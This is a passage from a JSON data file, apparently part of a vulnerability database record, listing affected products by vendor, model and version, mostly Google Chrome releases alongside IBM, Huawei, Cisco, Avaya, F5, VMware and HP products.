"google", "version": "24.0.1305.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.84" }, { "model": "system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x0" }, { "model": "system storage san768b-2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2499-816" }, { "model": "oceanstor s6800t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1075.0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.33" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.172" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.20" }, { "model": "oceanstor uds v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.117" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.535.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.16" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.443.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.296.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.107" }, { "model": "gaia r70.1", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "secure access core concentrator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.34" }, { "model": "esight network v200r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.18" }, { "model": "videoscape distribution suite transparent caching", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.776.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.96379" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.217" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.40" }, { "model": "9710-e08", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "vcenter infrastructure navigator", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "network security sensor appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1074.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.900.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.75" }, { "model": "junos space ja2500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.71" }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.611.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.407.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.892.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.29" }, { "model": "vsphere big data extensions", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.518.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.346.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1658.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.897.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.102" }, { "model": "oceanstor css v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.421.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.132" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.56" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.0" }, { "model": "ipso r75.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vcenter log insight", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "36.0.1985.143" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1003.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.382.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.927.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.23" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "storeever esl g3 tape library 671h gs00601", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.10" }, { "model": "nexus switch for nexus series 4.0 n1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v5000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.16" }, { "model": "nac server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1021.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.462.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.77" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "vcenter server appliance update", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.51" }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.818.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.645.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.4" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "6.1.1539" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1065.0" }, { "model": "database appliance", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2" }, { "model": "storeever esl g3 tape library 663h gs04601", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.674.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.39" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57350" }, { "model": "hyper-scale manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.905.0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.4" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "gaia r71.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.531.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.84" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0.34024" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1284.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1040.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.939.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4" }, { "model": "secureplatform r77", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.758.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.116" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.184" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.154" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.344" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.419.0" }, { "model": "operations analytics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.672.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.608.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.40" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.135" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.675.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.124" }, { "model": "high-density server dh620 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.9" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1072.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.102" }, { "model": "oceanstor s2600t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.435.0" }, { "model": "oceanstor vtl6000 v100r003c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.215" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.617.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.9" }, { "model": "storeever esl g3 tape library 655h gs10201", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1019.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.64" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.685.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.312" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.30" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.699.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.453.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.961.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.202" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75300" }, { "model": "ucs b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.341" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.57" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1058" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1662.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1669.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1054" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.506.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.132" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.16" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.168" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.35" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1286.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.703.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.668.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.744.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "configuration and orchestration manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.74" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75450" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1078.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.328.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.91" }, { "model": "sig9800 sig9800-x16 v300r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.381.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.144" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1283.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.25" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.711.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.330" }, { "model": "automation insight", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.00" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.21" }, { "model": "vcenter log insight", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "ios-xe for asr1k", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.511.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.147" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.797.0" }, { "model": "secureplatform r75.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "oic v100r001c00spc403", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.14443" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.521.0" }, { "model": "vfabric application director", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.46" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.774.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.458.2" }, { "model": "business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.46" }, { "model": 